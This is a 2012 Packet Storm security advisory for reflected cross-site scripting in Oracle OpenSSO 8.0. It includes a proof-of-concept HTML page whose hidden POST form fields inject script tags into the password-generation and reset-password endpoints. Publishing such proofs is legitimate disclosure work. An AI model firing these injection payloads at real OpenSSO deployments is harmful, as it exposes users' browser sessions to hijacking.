Oracle OpenSSO 8.0 Cross Site Scripting

2012-11-30T00:00:00
ID PACKETSTORM:118472
Type packetstorm
Reporter LiquidWorm
Modified 2012-11-30T00:00:00

Description

                                        
                                            `<!--  
  
Oracle OpenSSO 8.0 Multiple XSS POST Injection Vulnerabilities  
  
  
Vendor: Oracle Corporation  
Product web page: http://www.oracle.com  
Affected version: 8.0 Update 2 Patch3 Build 6.1 (2011-June-8 05:24)  
  
Summary: Oracle OpenSSO is a complete solution that provides Web  
access management, federated single sign-on and Web services  
security in a single, self-contained application.  
  
Desc: Oracle OpenSSO suffers from multiple cross-site scripting  
vulnerabilities when input passed via several parameters to several  
scripts is not properly sanitized before being returned to the user.  
This can be exploited to execute arbitrary HTML and script code in a  
user's browser session in context of an affected site.  
  
Tested on: Oracle-iPlanet-Web-Server/7.0  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2012-5114  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5114.php  
  
  
28.10.2012  
  
-->  
  
  
<html>  
<head>  
<title>Oracle OpenSSO 8.0 Multiple XSS POST Injection Vulnerabilities</title>  
</head>  
<body><center><br />  
  
<form method="POST" action="https://10.55.100.17/cmp_generate_tmp_pw.tiles">  
<input type="hidden" name="dob_Day" value='"><script>alert(1);</script>' />  
<input type="hidden" name="dob_Month" value='"><script>alert(2);</script>' />  
<input type="hidden" name="dob_Year" value='"><script>alert(3);</script>' />  
<input type="hidden" name="givenname" value='"><script>alert(4);</script>' />  
<input type="hidden" name="mail" value='"><script>alert(5);</script>' />  
<input type="hidden" name="sn" value='"><script>alert(6);</script>' />  
<input type="submit" value="#1" />  
</form>  
  
<br />  
  
<form method="POST" action="https://10.55.100.17/UI/Login?module=ResetPassword">  
<input type="hidden" name="dob_Day" value='"><script>alert(1);</script>' />  
<input type="hidden" name="dob_Month" value='"><script>alert(2);</script>' />  
<input type="hidden" name="dob_Year" value='"><script>alert(3);</script>' />  
<input type="hidden" name="givenname" value='"><script>alert(4);</script>' />  
<input type="hidden" name="mail" value='"><script>alert(5);</script>' />  
<input type="hidden" name="sn" value='"><script>alert(6);</script>' />  
<input type="hidden" name="x" value="41" />  
<input type="hidden" name="y" value="8" />  
<input type="submit" value="#2" />  
</form>  
  
</center></body>  
</html>  
`